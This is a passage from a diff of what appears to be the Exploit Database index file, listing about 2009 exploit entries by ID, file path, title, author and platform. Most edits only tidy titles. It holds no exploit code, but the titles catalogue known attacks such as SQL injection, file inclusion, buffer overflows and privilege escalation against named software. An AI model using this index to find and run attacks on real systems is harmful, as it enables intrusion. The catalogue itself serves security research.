(Metasploit)",2009-06-03,"Will Drewry",osx,remote,0 +8861,platforms/osx/remote/8861.rb,"Apple iTunes 8.1.1 - (ITMS) Multiple Protocol Handler Buffer Overflow (Metasploit)",2009-06-03,"Will Drewry",osx,remote,0 8862,platforms/windows/dos/8862.txt,"Apple QuickTime - Image Description Atom Sign Extension (PoC)",2009-06-03,webDEViL,windows,dos,0 8863,platforms/windows/local/8863.c,"Atomix Virtual Dj Pro 6.0 - Stack Buffer Overflow PoC (SEH)",2009-06-03,"fl0 fl0w",windows,local,0 8864,platforms/php/webapps/8864.txt,"My Mini Bill - (orderid) SQL Injection",2009-06-03,"ThE g0bL!N",php,webapps,0 @@ -8371,12 +8372,12 @@ id,file,description,date,author,platform,type,port 8871,platforms/php/webapps/8871.txt,"Movie PHP Script 2.0 - (init.php anticode) Code Execution",2009-06-03,SirGod,php,webapps,0 8872,platforms/php/webapps/8872.txt,"Joomla Component com_mosres - Multiple SQL Injections",2009-06-03,"Chip d3 bi0s",php,webapps,0 8873,platforms/multiple/dos/8873.c,"OpenSSL < 0.9.8i - DTLS ChangeCipherSpec Remote Denial of Service",2009-06-04,"Jon Oberheide",multiple,dos,0 -8874,platforms/php/webapps/8874.txt,"SuperCali PHP Event Calendar - Arbitrary Change Admin Password Exploit",2009-06-04,TiGeR-Dz,php,webapps,0 +8874,platforms/php/webapps/8874.txt,"SuperCali PHP Event Calendar - Arbitrary Change Admin Password",2009-06-04,TiGeR-Dz,php,webapps,0 8875,platforms/windows/local/8875.txt,"Online Armor < 3.5.0.12 - (OAmon.sys) Privilege Escalation",2009-06-04,"NT Internals",windows,local,0 -8876,platforms/php/webapps/8876.htm,"Web Directory PRO - 'Admins.php' Change Admin Password Exploit",2009-06-04,TiGeR-Dz,php,webapps,0 +8876,platforms/php/webapps/8876.htm,"Web Directory PRO - 'Admins.php' Change Admin Password",2009-06-04,TiGeR-Dz,php,webapps,0 8877,platforms/php/webapps/8877.txt,"Host Directory PRO 2.1.0 - Remote Database Backup",2009-06-04,ZoRLu,php,webapps,0 8878,platforms/php/webapps/8878.txt,"Web Directory PRO - Remote Database Backup",2009-06-04,TiGeR-Dz,php,webapps,0 -8879,platforms/php/webapps/8879.htm,"Host Directory PRO 2.1.0 - Remote Change Admin Password Exploit",2009-06-04,TiGeR-Dz,php,webapps,0 +8879,platforms/php/webapps/8879.htm,"Host Directory PRO 2.1.0 - Remote Change Admin Password",2009-06-04,TiGeR-Dz,php,webapps,0 8880,platforms/linux/remote/8880.txt,"kloxo 5.75 - Multiple Vulnerabilities",2009-06-04,anonymous,linux,remote,0 8881,platforms/windows/local/8881.php,"PeaZIP 2.6.1 - Compressed Filename Command Injection",2009-06-05,Nine:Situations:Group,windows,local,0 8882,platforms/php/webapps/8882.txt,"Pixelactivo 3.0 - (idx) SQL Injection",2009-06-05,snakespc,php,webapps,0 @@ -8385,13 +8386,13 @@ id,file,description,date,author,platform,type,port 8885,platforms/php/webapps/8885.pl,"Kjtechforce mailman b1 - (dest) Blind SQL Injection",2009-06-05,YEnH4ckEr,php,webapps,0 8886,platforms/php/webapps/8886.txt,"MyCars Automotive - (Authentication Bypass) SQL Injection",2009-06-08,snakespc,php,webapps,0 8889,platforms/asp/webapps/8889.txt,"VT-Auth 1.0 - (zHk8dEes3.txt) File Disclosure",2009-06-08,ByALBAYX,asp,webapps,0 -8890,platforms/asp/webapps/8890.txt,"fipsCMS Light 2.1 - (db.mdb) Remote Database Disclosure",2009-06-08,ByALBAYX,asp,webapps,0 +8890,platforms/asp/webapps/8890.txt,"fipsCMS Light 2.1 - 'db.mdb' Remote Database Disclosure",2009-06-08,ByALBAYX,asp,webapps,0 8891,platforms/php/webapps/8891.txt,"Joomla Component com_school 1.4 - (classid) SQL Injection",2009-06-08,"Chip d3 bi0s",php,webapps,0 8892,platforms/php/webapps/8892.txt,"Virtue Classifieds - (category) SQL Injection",2009-06-08,OzX,php,webapps,0 8893,platforms/php/webapps/8893.txt,"Virtue Book Store - 'cid' SQL Injection",2009-06-08,OzX,php,webapps,0 8894,platforms/php/webapps/8894.txt,"Virtue Shopping Mall - 'cid' SQL Injection",2009-06-08,OzX,php,webapps,0 8895,platforms/cgi/webapps/8895.txt,"Interlogy Profile Manager Basic - Insecure Cookie Handling",2009-06-08,ZoRLu,cgi,webapps,0 -8896,platforms/osx/local/8896.c,"Apple Mac OS X xnu 1228.9.59 - Kernel Privilege Escalation",2009-06-08,mu-b,osx,local,0 +8896,platforms/osx/local/8896.c,"Apple Mac OSX xnu 1228.9.59 - Kernel Privilege Escalation",2009-06-08,mu-b,osx,local,0 8897,platforms/windows/remote/8897.c,"httpdx 0.8 - FTP Server Delete/Get/Create Directories/Files Exploit",2009-06-08,"Jonathan Salwan",windows,remote,0 8898,platforms/php/webapps/8898.txt,"Joomla Component MooFAQ (com_moofaq) - Local File Inclusion",2009-06-08,"Chip d3 bi0s",php,webapps,0 8899,platforms/windows/dos/8899.txt,"SAP GUI 6.4 - ActiveX (Accept) Remote Buffer Overflow (PoC)",2009-06-08,DSecRG,windows,dos,0 @@ -8408,19 +8409,19 @@ id,file,description,date,author,platform,type,port 8912,platforms/php/webapps/8912.txt,"Joomla Component com_media_library 1.5.3 - Remote File Inclusion",2009-06-09,"Mehmet Ince",php,webapps,0 8913,platforms/php/webapps/8913.txt,"S-CMS 2.0b3 - Multiple Local File Inclusion",2009-06-09,YEnH4ckEr,php,webapps,0 8914,platforms/php/webapps/8914.txt,"S-CMS 2.0b3 - Multiple SQL Injections",2009-06-09,YEnH4ckEr,php,webapps,0 -8915,platforms/php/webapps/8915.pl,"S-CMS 2.0b3 - 'username' Blind SQL Injection",2009-06-09,YEnH4ckEr,php,webapps,0 -8916,platforms/windows/remote/8916.py,"Free Download Manager 2.5/3.0 - (Control Server) Remote Buffer Overflow Exploit",2009-06-09,His0k4,windows,remote,80 +8915,platforms/php/webapps/8915.pl,"S-CMS 2.0b3 - ''Username'' Blind SQL Injection",2009-06-09,YEnH4ckEr,php,webapps,0 +8916,platforms/windows/remote/8916.py,"Free Download Manager 2.5/3.0 - (Control Server) Remote Buffer Overflow",2009-06-09,His0k4,windows,remote,80 8917,platforms/php/webapps/8917.txt,"mrcgiguy the ticket system 2.0 PHP - Multiple Vulnerabilities",2009-06-09,"ThE g0bL!N",php,webapps,0 8918,platforms/php/webapps/8918.txt,"MRCGIGUY Hot Links - 'report.php id' SQL Injection",2009-06-09,"ThE g0bL!N",php,webapps,0 8919,platforms/php/webapps/8919.txt,"Joomla Component com_realestatemanager 1.0 - Remote File Inclusion",2009-06-09,"Mehmet Ince",php,webapps,0 8920,platforms/php/webapps/8920.txt,"Joomla Component com_vehiclemanager 1.0 - Remote File Inclusion",2009-06-09,"Mehmet Ince",php,webapps,0 8921,platforms/php/webapps/8921.sh,"phpMyAdmin - '/scripts/setup.php' PHP Code Injection",2009-06-09,"Adrian ""pagvac"" Pastor",php,webapps,0 8922,platforms/windows/remote/8922.txt,"DX Studio Player < 3.0.29.1 Firefox plugin - Command Injection",2009-06-10,"Core Security",windows,remote,0 -8923,platforms/php/webapps/8923.txt,"LightNEasy sql/no-db 2.2.x - System Config Disclosure Exploit",2009-06-10,StAkeR,php,webapps,0 +8923,platforms/php/webapps/8923.txt,"LightNEasy sql/no-db 2.2.x - System Config Disclosure",2009-06-10,StAkeR,php,webapps,0 8924,platforms/php/webapps/8924.txt,"School Data Navigator - (page) Local / Remote File Inclusion",2009-06-10,Br0ly,php,webapps,0 8925,platforms/php/webapps/8925.txt,"Desi Short URL Script - (Authentication Bypass) Insecure Cookie Handling",2009-06-10,N@bilX,php,webapps,0 8926,platforms/php/webapps/8926.txt,"mrcgiguy freeticket - (Cookie Handling / SQL Injection) Multiple Vulnerabilities",2009-06-10,"ThE g0bL!N",php,webapps,0 -8927,platforms/php/webapps/8927.pl,"Open Biller 0.1 - 'username' Blind SQL Injection",2009-06-10,YEnH4ckEr,php,webapps,0 +8927,platforms/php/webapps/8927.pl,"Open Biller 0.1 - ''Username'' Blind SQL Injection",2009-06-10,YEnH4ckEr,php,webapps,0 8928,platforms/php/webapps/8928.txt,"PHPWebThings 1.5.2 - (help.php module) Local File Inclusion",2009-06-11,Br0ly,php,webapps,0 8929,platforms/php/webapps/8929.txt,"Splog 1.2 Beta - Multiple SQL Injections",2009-06-11,YEnH4ckEr,php,webapps,0 8930,platforms/windows/remote/8930.txt,"ModSecurity 2.5.9 (Core Rules 2.5-1.6.1) - Filter Bypass",2009-06-11,"Lavakumar Kuppan",windows,remote,0 @@ -8432,7 +8433,7 @@ id,file,description,date,author,platform,type,port 8936,platforms/php/webapps/8936.txt,"4Images 1.7.7 - Filter Bypass HTML Injection / Cross-Site Scripting",2009-06-12,Qabandi,php,webapps,0 8937,platforms/php/webapps/8937.txt,"campus virtual-lms - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-06-12,Yasión,php,webapps,0 8938,platforms/windows/remote/8938.txt,"Green Dam 3.17 (Windows XP SP2) - (URL) Remote Buffer Overflow",2009-06-12,seer[N.N.U],windows,remote,0 -8939,platforms/php/webapps/8939.pl,"phpWebThings 1.5.2 - MD5 Hash Retrieve/File Disclosure Exploit",2009-06-12,StAkeR,php,webapps,0 +8939,platforms/php/webapps/8939.pl,"phpWebThings 1.5.2 - MD5 Hash Retrieve/File Disclosure",2009-06-12,StAkeR,php,webapps,0 8940,platforms/multiple/dos/8940.pl,"Asterisk IAX2 - Resource Exhaustion via Attacked IAX Fuzzer",2009-06-12,"Blake Cornell",multiple,dos,0 8941,platforms/php/webapps/8941.txt,"pivot 1.40.4-7 - Multiple Vulnerabilities",2009-06-12,intern0t,php,webapps,0 8942,platforms/php/webapps/8942.txt,"tbdev 01-01-2008 - Multiple Vulnerabilities",2009-06-12,intern0t,php,webapps,0 @@ -8443,7 +8444,7 @@ id,file,description,date,author,platform,type,port 8948,platforms/php/webapps/8948.txt,"Mundi Mail 0.8.2 - (top) Remote File Inclusion",2009-06-15,Br0ly,php,webapps,0 8949,platforms/php/webapps/8949.txt,"SugarCRM 5.2.0e - Remote Code Execution",2009-06-15,USH,php,webapps,0 8950,platforms/php/webapps/8950.txt,"formmail 1.92 - Multiple Vulnerabilities",2009-06-15,USH,php,webapps,0 -8951,platforms/php/webapps/8951.php,"DB Top Sites 1.0 - Remote Command Execution Exploit",2009-06-15,SirGod,php,webapps,0 +8951,platforms/php/webapps/8951.php,"DB Top Sites 1.0 - Remote Command Execution",2009-06-15,SirGod,php,webapps,0 8952,platforms/php/webapps/8952.txt,"DB Top Sites 1.0 - (index.php u) Local File Inclusion",2009-06-15,SirGod,php,webapps,0 8953,platforms/php/webapps/8953.txt,"elvin bts 1.2.0 - Multiple Vulnerabilities",2009-06-15,SirGod,php,webapps,0 8954,platforms/php/webapps/8954.txt,"adaptweb 0.9.2 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2009-06-15,SirGod,php,webapps,0 @@ -8452,7 +8453,7 @@ id,file,description,date,author,platform,type,port 8957,platforms/multiple/dos/8957.txt,"Apple Safari & QuickTime - Denial of Service",2009-06-15,"Thierry Zoller",multiple,dos,0 8958,platforms/php/webapps/8958.txt,"torrenttrader classic 1.09 - Multiple Vulnerabilities",2009-06-15,waraxe,php,webapps,0 8959,platforms/php/webapps/8959.pl,"Joomla Component com_ijoomla_rss - Blind SQL Injection",2009-06-15,"Mehmet Ince",php,webapps,0 -8960,platforms/linux/dos/8960.py,"Apple QuickTime - CRGN Atom Local Crash Exploit",2009-06-15,webDEViL,linux,dos,0 +8960,platforms/linux/dos/8960.py,"Apple QuickTime - CRGN Atom Local Crash",2009-06-15,webDEViL,linux,dos,0 8961,platforms/php/webapps/8961.txt,"WordPress Plugin Photoracer 1.0 - 'id' SQL Injection",2009-06-15,Kacper,php,webapps,0 8962,platforms/php/webapps/8962.txt,"PHPCollegeExchange 0.1.5c - (listing_view.php itemnr) SQL Injection",2009-06-15,SirGod,php,webapps,0 8963,platforms/hardware/remote/8963.txt,"Netgear DG632 Router - Authentication Bypass",2009-06-15,"Tom Neaves",hardware,remote,0 @@ -8498,7 +8499,7 @@ id,file,description,date,author,platform,type,port 9008,platforms/php/webapps/9008.txt,"phpCollegeExchange 0.1.5c - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-06-23,CraCkEr,php,webapps,0 9009,platforms/php/webapps/9009.txt,"BASE 1.2.4 - (Authentication Bypass) Insecure Cookie Handling",2009-06-24,"Tim Medin",php,webapps,0 9010,platforms/php/webapps/9010.txt,"Glossword 1.8.11 - (index.php x) Local File Inclusion",2009-06-24,t0fx,php,webapps,0 -9011,platforms/php/webapps/9011.txt,"Joomla Component com_pinboard - Remote File Upload",2009-06-24,"ViRuSMaN ",php,webapps,0 +9011,platforms/php/webapps/9011.txt,"Joomla Component com_pinboard - Arbitrary File Upload",2009-06-24,"ViRuSMaN ",php,webapps,0 9012,platforms/php/webapps/9012.txt,"tribiq CMS 5.0.12c - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities",2009-06-24,CraCkEr,php,webapps,0 9014,platforms/php/webapps/9014.txt,"PHPEcho CMS 2.0-rc3 - (forum) Cross-Site Scripting Cookie Stealing / Blind",2009-06-24,JosS,php,webapps,0 9015,platforms/php/webapps/9015.txt,"LightOpenCMS 0.1 - (smarty.php cwd) Local File Inclusion",2009-06-24,JosS,php,webapps,0 @@ -8517,7 +8518,7 @@ id,file,description,date,author,platform,type,port 9028,platforms/php/webapps/9028.txt,"Joomla Component com_php - 'id' Blind SQL Injection",2009-06-29,"Chip d3 bi0s",php,webapps,0 9029,platforms/windows/dos/9029.rb,"VideoLAN VLC Media Player 0.9.9 - smb:// URI Stack Buffer Overflow (PoC)",2009-06-29,Trancer,windows,dos,0 9030,platforms/php/webapps/9030.txt,"Joomla Component com_K2 -q 1.0.1b - (category) SQL Injection",2009-06-29,"Chip d3 bi0s",php,webapps,0 -9031,platforms/windows/remote/9031.py,"Bopup Communications Server 3.2.26.5460 - Remote Buffer Overflow Exploit (SEH)",2009-06-29,His0k4,windows,remote,19810 +9031,platforms/windows/remote/9031.py,"Bopup Communications Server 3.2.26.5460 - Remote Buffer Overflow (SEH)",2009-06-29,His0k4,windows,remote,19810 9032,platforms/php/webapps/9032.txt,"osTicket 1.6 RC4 - Admin Login Blind SQL Injection",2009-06-29,"Adam Baldwin",php,webapps,0 9033,platforms/windows/dos/9033.pl,"SCMPX 1.5.1 - '.m3u' Local Heap Overflow (PoC)",2009-06-29,hack4love,windows,dos,0 9034,platforms/windows/local/9034.pl,"HT-MP3Player 1.0 - '.ht3' Local Buffer Overflow (SEH)",2009-06-29,hack4love,windows,local,0 @@ -8555,9 +8556,9 @@ id,file,description,date,author,platform,type,port 9068,platforms/php/webapps/9068.txt,"kervinet forum 1.1 - Multiple Vulnerabilities",2009-07-01,eLwaux,php,webapps,0 9069,platforms/php/webapps/9069.txt,"cms chainuk 1.2 - Multiple Vulnerabilities",2009-07-01,eLwaux,php,webapps,0 9070,platforms/windows/local/9070.pl,"AudioPLUS 2.00.215 - '.pls' Local Buffer Overflow (SEH)",2009-07-01,Stack,windows,local,0 -9071,platforms/multiple/dos/9071.txt,"Apple Safari 4.x - JavaScript Reload Remote Crash Exploit",2009-07-02,SkyOut,multiple,dos,0 +9071,platforms/multiple/dos/9071.txt,"Apple Safari 4.x - JavaScript Reload Remote Crash",2009-07-02,SkyOut,multiple,dos,0 9072,platforms/multiple/local/9072.txt,"Oracle 10g - SYS.LT.COMPRESSWORKSPACETREE SQL Injection (2)",2009-07-02,"Sumit Siddharth",multiple,local,0 -9073,platforms/php/webapps/9073.php,"YourTube 2.0 - Arbitrary Database Disclosure Exploit",2009-07-02,"Security Code Team",php,webapps,0 +9073,platforms/php/webapps/9073.php,"YourTube 2.0 - Arbitrary Database Disclosure",2009-07-02,"Security Code Team",php,webapps,0 9074,platforms/cgi/webapps/9074.txt,"Sourcefire 3D Sensor & Defense Center 4.8.x - Privilege Escalation",2009-07-02,"Gregory Duchemin",cgi,webapps,0 9075,platforms/php/webapps/9075.txt,"AdminLog 0.5 - (valid_login) Authentication Bypass",2009-07-02,SirGod,php,webapps,0 9076,platforms/php/webapps/9076.php,"Almnzm 2.0 - Blind SQL Injection",2009-07-02,Qabandi,php,webapps,0 @@ -8570,7 +8571,7 @@ id,file,description,date,author,platform,type,port 9084,platforms/windows/dos/9084.txt,"Soulseek 157 NS < 13e/156.x - Remote Peer Search Code Execution (PoC)",2009-07-09,"laurent gaffié ",windows,dos,0 9085,platforms/multiple/dos/9085.txt,"MySQL 5.0.45 - (Post-Authentication) COM_CREATE_DB Format String PoC",2009-07-09,kingcope,multiple,dos,0 9086,platforms/php/webapps/9086.txt,"MRCGIGUY Thumbnail Gallery Post 1b - Arbitrary File Upload",2009-07-09,"ThE g0bL!N",php,webapps,0 -9087,platforms/php/webapps/9087.php,"Nwahy Dir 2.1 - Arbitrary Change Admin Password Exploit",2009-07-09,rEcruit,php,webapps,0 +9087,platforms/php/webapps/9087.php,"Nwahy Dir 2.1 - Arbitrary Change Admin Password",2009-07-09,rEcruit,php,webapps,0 9088,platforms/php/webapps/9088.txt,"Glossword 1.8.11 - Arbitrary Uninstall / Install",2009-07-09,Evil-Cod3r,php,webapps,0 9089,platforms/php/webapps/9089.txt,"ClearContent - 'image.php url' Remote File Inclusion / Local File Inclusion",2009-07-09,MizoZ,php,webapps,0 9090,platforms/windows/dos/9090.pl,"otsAV DJ 1.85.064 - '.ofl' Local Heap Overflow (PoC)",2009-07-09,hack4love,windows,dos,0 @@ -8587,7 +8588,7 @@ id,file,description,date,author,platform,type,port 9101,platforms/php/webapps/9101.txt,"phpbms 0.96 - Multiple Vulnerabilities",2009-07-10,eLwaux,php,webapps,0 9102,platforms/windows/dos/9102.pl,"PatPlayer 3.9 - '.m3u' Local Heap Overflow (PoC)",2009-07-10,Cyber-Zone,windows,dos,0 9103,platforms/php/webapps/9103.txt,"gencms 2006 - Multiple Vulnerabilities",2009-07-10,eLwaux,php,webapps,0 -9104,platforms/windows/local/9104.py,"Photo DVD Maker Pro 8.02 - '.pdm' Local Buffer Overflow Exploit (SEH)",2009-07-10,His0k4,windows,local,0 +9104,platforms/windows/local/9104.py,"Photo DVD Maker Pro 8.02 - '.pdm' Local Buffer Overflow (SEH)",2009-07-10,His0k4,windows,local,0 9105,platforms/php/webapps/9105.txt,"MyMsg 1.0.3 - 'uid' SQL Injection",2009-07-10,Monster-Dz,php,webapps,0 9106,platforms/windows/remote/9106.txt,"citrix xencenterweb - (Cross-Site Scripting / SQL Injection / Remote Code Execution) Multiple Vulnerabilities",2009-07-10,"Secure Network",windows,remote,0 9107,platforms/php/webapps/9107.txt,"Phenotype CMS 2.8 - (login.php user) Blind SQL Injection",2009-07-10,"Khashayar Fereidani",php,webapps,0 @@ -8610,31 +8611,31 @@ id,file,description,date,author,platform,type,port 9125,platforms/php/webapps/9125.txt,"Ebay Clone 2009 - Multiple SQL Injections",2009-07-11,MizoZ,php,webapps,0 9126,platforms/php/webapps/9126.txt,"Joomla Component com_category - 'catid' SQL Injection",2009-07-11,Prince_Pwn3r,php,webapps,0 9127,platforms/php/webapps/9127.txt,"d.net CMS - Arbitrary Reinstall/Blind SQL Injection",2009-07-11,darkjoker,php,webapps,0 -9128,platforms/windows/remote/9128.py,"Pirch IRC 98 Client - 'Response' Remote Buffer Overflow Exploit (SEH)",2009-07-12,His0k4,windows,remote,0 +9128,platforms/windows/remote/9128.py,"Pirch IRC 98 Client - 'Response' Remote Buffer Overflow (SEH)",2009-07-12,His0k4,windows,remote,0 9129,platforms/php/webapps/9129.txt,"censura 1.16.04 - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-12,Vrs-hCk,php,webapps,0 9130,platforms/php/webapps/9130.txt,"PHP AdminPanel Free 1.0.5 - Remote File Disclosure",2009-07-12,"Khashayar Fereidani",php,webapps,0 9131,platforms/windows/dos/9131.py,"Tandberg MXP F7.0 - (USER) Remote Buffer Overflow (PoC)",2009-07-13,otokoyama,windows,dos,0 9132,platforms/php/webapps/9132.py,"RunCMS 1.6.3 - (double ext) Remote Shell Injection",2009-07-13,StAkeR,php,webapps,0 -9133,platforms/windows/dos/9133.pl,"ScITE Editor 1.72 - Local Crash Exploit",2009-07-13,prodigy,windows,dos,0 +9133,platforms/windows/dos/9133.pl,"ScITE Editor 1.72 - Local Crash",2009-07-13,prodigy,windows,dos,0 9134,platforms/freebsd/dos/9134.c,"FreeBSD 6/8 - (ata device) Local Denial of Service",2009-07-13,"Shaun Colley",freebsd,dos,0 9135,platforms/linux/local/9135.sh,"Openswan 2.4.12/2.6.16 - Insecure Temp File Creation Root Exploit",2009-07-13,nofame,linux,local,0 9136,platforms/windows/local/9136.pl,"Mp3-Nator 2.0 - (ListData.dat) Universal Buffer Overflow (SEH)",2009-07-13,"ThE g0bL!N",windows,local,0 9137,platforms/windows/remote/9137.html,"Mozilla Firefox 3.5 - (Font tags) Remote Buffer Overflow",2009-07-13,Sberry,windows,remote,0 9138,platforms/php/webapps/9138.txt,"onepound shop 1.x - products.php SQL Injection",2009-07-13,Affix,php,webapps,0 -9139,platforms/windows/remote/9139.pl,"JetAudio 7.5.3 COWON Media Center - '.wav' Crash Exploit",2009-07-14,prodigy,windows,remote,0 +9139,platforms/windows/remote/9139.pl,"JetAudio 7.5.3 COWON Media Center - '.wav' Crash",2009-07-14,prodigy,windows,remote,0 9140,platforms/cgi/webapps/9140.txt,"DJ Calendar - 'DJcalendar.cgi TEMPLATE' File Disclosure",2009-07-14,cibbao,cgi,webapps,0 9141,platforms/windows/dos/9141.pl,"Icarus 2.0 - '.icp' Local Stack Overflow (PoC)",2009-07-14,"ThE g0bL!N",windows,dos,0 9142,platforms/windows/local/9142.c,"Live For Speed 2 Version Z - '.Mpr' Local Buffer Overflow",2009-07-14,n00b,windows,local,0 9143,platforms/linux/remote/9143.txt,"Virtualmin < 3.703 - Multiple Local+Remote Vulnerabilities",2009-07-14,"Filip Palian",linux,remote,0 9144,platforms/php/webapps/9144.txt,"Mobilelib Gold 3.0 - Local File Disclosure",2009-07-14,Qabandi,php,webapps,0 9145,platforms/php/webapps/9145.php,"Traidnt UP 2.0 - Blind SQL Injection",2009-07-14,Qabandi,php,webapps,0 -9146,platforms/windows/local/9146.pl,"Icarus 2.0 - '.ICP' Local Stack Overflow Exploit",2009-07-14,[0]x80->[H]4x²0r,windows,local,0 +9146,platforms/windows/local/9146.pl,"Icarus 2.0 - '.ICP' Local Stack Overflow",2009-07-14,[0]x80->[H]4x²0r,windows,local,0 9147,platforms/windows/dos/9147.pl,"MixVibes Pro 7.043 - '.vib' Local Stack Overflow (PoC)",2009-07-14,hack4love,windows,dos,0 9148,platforms/windows/local/9148.py,"Live For Speed 2 Version Z - '.mpr' Buffer Overflow (SEH)",2009-07-14,His0k4,windows,local,0 9149,platforms/windows/local/9149.pl,"Icarus 2.0 - '.icp' Local Buffer Overflow (SEH)",2009-07-15,hack4love,windows,local,0 9150,platforms/php/webapps/9150.txt,"WordPress Plugin My Category Order 2.8 - SQL Injection",2009-07-15,"Manh Luat",php,webapps,0 9151,platforms/php/webapps/9151.txt,"ILIAS Lms 3.9.9/3.10.7 - Arbitrary Edition/Info Disclosure Vulnerabilities",2009-07-15,YEnH4ckEr,php,webapps,0 -9152,platforms/windows/local/9152.pl,"AudioPLUS 2.00.215 - '.m3u' / '.lst' Universal SEH Overwrite",2009-07-15,Stack,windows,local,0 +9152,platforms/windows/local/9152.pl,"AudioPLUS 2.00.215 - '.m3u' / '.lst' Universal Overwrite (SEH)",2009-07-15,Stack,windows,local,0 9153,platforms/php/webapps/9153.txt,"Admin News Tools 2.5 - (fichier) Remote File Disclosure",2009-07-15,Securitylab.ir,php,webapps,0 9154,platforms/php/webapps/9154.js,"ZenPhoto 1.2.5 - Completely Blind SQL Injection",2009-07-15,petros,php,webapps,0 9155,platforms/php/webapps/9155.txt,"PHPGenealogy 2.0 - (DataDirectory) Remote File Inclusion",2009-07-15,"Khashayar Fereidani",php,webapps,0 @@ -8659,13 +8660,13 @@ id,file,description,date,author,platform,type,port 9174,platforms/php/webapps/9174.txt,"PHP Live! 3.2.1/2 - '&x=' Blind SQL Injection",2009-07-16,boom3rang,php,webapps,0 9175,platforms/multiple/dos/9175.txt,"Sguil/PADS - Remote Server Crash",2009-07-17,Ataraxia,multiple,dos,0 9176,platforms/php/webapps/9176.txt,"dB Masters MultiMedia's Content Manager 4.5 - SQL Injection",2009-07-16,NoGe,php,webapps,0 -9177,platforms/windows/local/9177.pl,"Easy RM to MP3 Converter 2.7.3.700 - '.m3u' Universal Buffer Overflow Exploit",2009-07-16,Crazy_Hacker,windows,local,0 -9178,platforms/windows/dos/9178.pl,"MixSense 1.0.0.1 DJ Studio - '.mp3' Crash Exploit",2009-07-16,prodigy,windows,dos,0 +9177,platforms/windows/local/9177.pl,"Easy RM to MP3 Converter 2.7.3.700 - '.m3u' Universal Buffer Overflow",2009-07-16,Crazy_Hacker,windows,local,0 +9178,platforms/windows/dos/9178.pl,"MixSense 1.0.0.1 DJ Studio - '.mp3' Crash",2009-07-16,prodigy,windows,dos,0 9179,platforms/php/webapps/9179.txt,"Super Simple Blog Script 2.5.4 - Local File Inclusion",2009-07-17,JIKO,php,webapps,0 9180,platforms/php/webapps/9180.txt,"Super Simple Blog Script 2.5.4 - (entry) SQL Injection",2009-07-17,JIKO,php,webapps,0 9181,platforms/windows/remote/9181.py,"Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray Exploit (1)",2009-07-17,"David Kennedy (ReL1K)",windows,remote,0 9182,platforms/php/webapps/9182.txt,"AJOX Poll - 'managepoll.php' Authentication Bypass",2009-07-17,SirGod,php,webapps,0 -9183,platforms/php/webapps/9183.txt,"Battle Blog 1.25 - Authentication Bypass SQL Injection / HTML Injection",2009-07-17,$qL_DoCt0r,php,webapps,0 +9183,platforms/php/webapps/9183.txt,"Battle Blog 1.25 - Authentication Bypass / SQL Injection / HTML Injection",2009-07-17,$qL_DoCt0r,php,webapps,0 9184,platforms/php/webapps/9184.txt,"Ger Versluis 2000 5.5 24 - SITE_fiche.php SQL Injection",2009-07-17,DeCo017,php,webapps,0 9185,platforms/php/webapps/9185.txt,"good/bad vote - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities",2009-07-17,Moudi,php,webapps,0 9186,platforms/windows/local/9186.pl,"Easy RM to MP3 Converter - '.m3u' Universal Stack Overflow",2009-07-17,Stack,windows,local,0 @@ -8690,7 +8691,7 @@ id,file,description,date,author,platform,type,port 9208,platforms/linux/local/9208.txt,"PulseAudio setuid (Ubuntu 9.04 / Slackware 12.2.0) - Privilege Escalation",2009-07-20,anonymous,linux,local,0 9209,platforms/hardware/remote/9209.txt,"DD-WRT - (httpd service) Remote Command Execution",2009-07-20,gat3way,hardware,remote,0 9211,platforms/php/webapps/9211.txt,"Alibaba-clone CMS - SQL Injection / Blind SQL Injection",2009-07-20,"599eme Man",php,webapps,0 -9212,platforms/windows/dos/9212.pl,"Acoustica MP3 Audio Mixer 2.471 - '.sgp' Crash Exploit",2009-07-20,prodigy,windows,dos,0 +9212,platforms/windows/dos/9212.pl,"Acoustica MP3 Audio Mixer 2.471 - '.sgp' Crash",2009-07-20,prodigy,windows,dos,0 9213,platforms/windows/dos/9213.pl,"Acoustica MP3 Audio Mixer 2.471 - '.m3u' Local Heap Overflow (PoC)",2009-07-20,"D3V!L FUCK3R",windows,dos,0 9214,platforms/windows/remote/9214.pl,"Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray Exploit (Perl) (2)",2009-07-20,netsoul,windows,remote,0 9215,platforms/windows/local/9215.pl,"Streaming Audio Player 0.9 - (skin) Local Stack Overflow (SEH)",2009-07-20,SkuLL-HackeR,windows,local,0 @@ -8709,11 +8710,11 @@ id,file,description,date,author,platform,type,port 9229,platforms/windows/local/9229.py,"WINMOD 1.4 - '.lst' Universal Buffer Overflow (SEH) (2)",2009-07-22,Dz_Girl,windows,local,0 9231,platforms/php/webapps/9231.txt,"Phorum 5.2.11 - Permanent Cross-Site Scripting",2009-07-22,Crashfr,php,webapps,0 9234,platforms/windows/local/9234.pl,"WINMOD 1.4 - '.lst' Local Stack Overflow",2009-07-23,"CWH Underground",windows,local,0 -9235,platforms/php/webapps/9235.php,"e107 Plugin my_gallery 2.4.1 - readfile() Local File Disclosure Exploit",2009-07-23,NoGe,php,webapps,0 +9235,platforms/php/webapps/9235.php,"e107 Plugin my_gallery 2.4.1 - readfile() Local File Disclosure",2009-07-23,NoGe,php,webapps,0 9236,platforms/php/webapps/9236.txt,"GLinks 2.1 - (cat) Blind SQL Injection",2009-07-23,"599eme Man",php,webapps,0 9237,platforms/php/webapps/9237.txt,"AWCM 2.1 - Local File Inclusion / Authentication Bypass",2009-07-23,SwEET-DeViL,php,webapps,0 9238,platforms/php/webapps/9238.txt,"Joomla Component com_joomloads - (packageId) SQL Injection",2009-07-23,Mr.tro0oqy,php,webapps,0 -9239,platforms/php/webapps/9239.txt,"PHP Melody 1.5.3 - Remote File Upload Injection",2009-07-23,"Chip d3 bi0s",php,webapps,0 +9239,platforms/php/webapps/9239.txt,"PHP Melody 1.5.3 - Arbitrary File Upload Injection",2009-07-23,"Chip d3 bi0s",php,webapps,0 9240,platforms/windows/dos/9240.py,"OpenH323 Opal SIP Protocol - Remote Denial of Service",2009-07-24,"Jose Miguel Esparza",windows,dos,0 9241,platforms/windows/dos/9241.py,"Ekiga 2.0.5 - (GetHostAddress) Remote Denial of Service",2009-07-24,"Jose Miguel Esparza",windows,dos,0 